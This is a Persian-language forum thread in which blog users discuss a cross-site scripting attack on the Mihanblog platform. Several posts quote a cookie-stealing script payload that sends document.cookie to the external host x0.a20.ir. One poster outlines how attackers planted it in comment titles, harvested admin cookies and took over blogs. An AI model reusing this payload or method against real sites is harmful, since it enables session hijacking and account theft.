كدي براي بدست آوردن پسورد؟؟؟

[ya30n]

دوستان سلام

يه پيام اومده بود
وقتي باز كردم ديدم مرورگر رفت تو يه آدرسي كه پر از كد و... بود!!!

بعد برگشت خونه اصلي!

سريع پسوردها و... عوض كردم و كوكي ها رو هم پاك كردم

ميتونه مشكلي بوجود بياد؟؟؟

script>location="http://x0.a20.ir/?c="+document.cookie</script>

يكي راهنمايي كنه لطفا!

يا حق

 

[متالیک]

دوستان سلام

يه پيام اومده بود
وقتي باز كردم ديدم مرورگر رفت تو يه آدرسي كه پر از كد و... بود!!!

بعد برگشت خونه اصلي!

سريع پسوردها و... عوض كردم و كوكي ها رو هم پاك كردم

ميتونه مشكلي بوجود بياد؟؟؟

script>location="http://x0.a20.ir/?c="+document.cookie</script>

يكي راهنمايي كنه لطفا!

يا حق

سلام
وای عجب کد شاهکاریه این کد!!
من فکر می کنم اگه پسوردتون رو سریع عوض کرده باشید مشکلی نباشه.
این کد

 

[ya30n]

ممنون متاليك عزيز
پس پسورد واسشون ارسال ميشه؟!
بله عوض كردم
اما
سوالم اينه كه ميتونم دوباره با مرورگر وارد شم؟
پسورد رو ميفرسته يا نه؟
البته كوكي ها رو پاك كردم
كار ديگه اي لازمه بكنم؟

يا حق

 

[Muhammadinfo]

چطوری پس میفرسه

 

[balabala]

یوزر پسورد سایتی که سر زدی رو ممکنه بتونه بدزده.

 

[Mahdy2021]

به نظرتون میشه این سایت http://x0.a20.ir رو به نیک گزارش کرد؟ اگر براشون ثابت بشه دارن استفاده غیرمجاز و دزدی میکنن کاری میکنن؟

 

[ya30n]

والله نميدونم!
تا پيام رو باز كردم ديدم ييهو يه كدهايي تو مرورگر وارد شد و ...
مث اسكريپت هايي كه براي هك سايت اضافه ميكنن؟ اونجوري بود!
محمد جان يه پيام ميفرستم لطفا چك كن
قربانت
يا حق

 

[ya30n]

جديييييييييييييييي؟
كلا همه سايت ها رو كه وارد شدم؟
اگه اينجوريه كه بدبخت ميشم!!!

نميشه كاري كرد؟
الان به نيك گزارش ميدم
نميشه دست رو دست گذاشت كه!

يا حق

 

[متالیک]

نه همه ی سایت ها که وارد شدی نه
فقط همون سایتی که لینک داخلش بوده
در ضمن پسورد هم معلوم نیست ارسال بشه یا نه
بستگی به سیستم مورد استفاده در سایت داره
کلا اطلاعاتی که در کوکی ذخیره شده ارسال می شه و معمولا پسورد داخل کوکی ذخیره نمی شه

 

[ya30n]

نه همه ی سایت ها که وارد شدی نه
فقط همون سایتی که لینک داخلش بوده
در ضمن پسورد هم معلوم نیست ارسال بشه یا نه
بستگی به سیستم مورد استفاده در سایت داره
کلا اطلاعاتی که در کوکی ذخیره شده ارسال می شه و معمولا پسورد داخل کوکی ذخیره نمی شه

خدا كنه
مرسي متاليك جان

دوستان فقط براي من ارسال نشده
براي چند نفر ديگه هم ارسال شده اين پيام!
من الان به نيك گزارش دادم
خدا كنه يه كاري بكنن!

پايدار باشيد
يا حق

 

[Cyber.Back]

حقیقت این کار از سر.... اب میخوره


a2.a20.ir

a9.a20.ir

x0.a20.ir

و..



ظرف 3 روز چند صد وبلاگ از میهن بلاگ به خاطر این باگ ناکار شدن :دی



این یه باگ Cross Site Scripting بود یعنی XSS

این باگ توسط xxx x x x کشف شد چندین ماه قبل وقتی سیستم جدید میهن بلاگ رو به کار شد و تازگی هم نداره ×××


ولی همین یک هفته پیش توسط یه فرد لاشی و اسکل این باگ نازنازی از حالت Prv8 به Public تنزل پیدا کرد و........


و هرکی هرکی شد




حالا کار این bug رو شرح میدم :

ابتدا یه کامنت به مدیر میفرستن و Title از این استفاده میکنن

بعد یه کوکی گرابر تو اون سایت که ما بهش منتقل میشیم میزارن و...


بعد کوکی ها تو یه فایل ذخیره میشن که قسمت phpside لازم میشه و بغییه هیچی :دی


و راحت با کوکی لاگین میکنن و تغییر پسورد و مالکیت وبلاگ




و روز اولی که پابلیک شد من فورا به مدیر میهن بلاگ میل زدم و قضیه رو گفتم و حتتی نحوه پچ کردن رو هم گفتم

ولی ظاهرا کسی به حرفم گوش نداد و گفتم به جهنم من که ضرر نمیکنم از اعتبار خودتون کم میشه



که خوشخبتانه بعد از چهارمین روز فاجعه ! باگ رو پچ کردن


ولی شوربختانه هنوزم که هنوزه یه جای دیگه کار میلنگه چون یه باگ نسبتا خفن هم پیداکردیم که ...

ولی مطمعن باشید این یکی اصلا پابلیک نمیشه چون کار هرکس نیست خرمن کوفتن و ادامه داستان



درضمن وقتی با چنین حالتی مواجه شدین فقط یک بار Log out کنید وبس واصلا هم لازم نیست پسورد رو عوض کنید و نگران باشید !!!

چون رو سرور کوکی همون لحظه ذخیره میشه و تا خارج نشین کوکی پابرجاست ولی وقتی خارج شدین کوکی از بین میره

 

[ya30n]

ولی ظاهرا کسی به حرفم گوش نداد و گفتم به جهنم من که ضرر نمیکنم از اعتبار خودتون کم میشه

دمت گرم پسر
حال دادي اساسي ايول...
منم ميل زدم خو؟
انگار نه انگار !!!

بازم ممنونم
شاد باشي

يا حق